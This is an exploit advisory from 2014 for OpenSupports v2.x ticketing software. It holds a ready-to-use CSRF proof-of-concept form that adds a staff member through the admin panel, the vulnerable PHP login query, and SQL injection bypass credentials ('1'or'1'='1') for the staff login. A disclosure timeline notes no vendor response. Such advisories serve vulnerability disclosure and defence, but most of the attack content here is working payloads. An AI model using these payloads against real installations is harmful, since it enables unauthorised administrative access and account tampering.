[+] Author: TUNISIAN CYBER [+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities [+] Date: 15-03-2014 [+] Category: WebApp [+] Version: 2.x [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-302/CWE-89 [+] Vendor: http://www.opensupports.com/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities. 2.Version: 2.x 3.Background: http://www.opensupports.com/wiki/index.php?title=Main_Page 4.Proof Of Concept: CSRF:Add Staff Members <html> <form method="POST" name="form0" action="http://www.opensupports.com/demo/admin/staffadmin.php?id=agregar"> <input type="hidden" name="nombre" value="TCYB3Rx20x"/> <input type="hidden" name="email" value="g4k@hotmail.esxxx"/> <input type='submit' name='Submit4' value="Agregar"> </form> </html> Authentication Bypass: File: staff.php [PHP] if(isset($_POST['user'])){ $user = $_POST['user']; $pass = $_POST['pass']; $userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1"); [PHP] Username:1'or'1'='1 Password:1'or'1'='1 5.Solution(s): no contact from vendor 6.TIME-LINE: 2014-13-03: Vulnerability was discovered. 2014-13-03: Contact with vendor. 2014-14-03: No reply. 2014-15-03: No reply. 2014-15-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members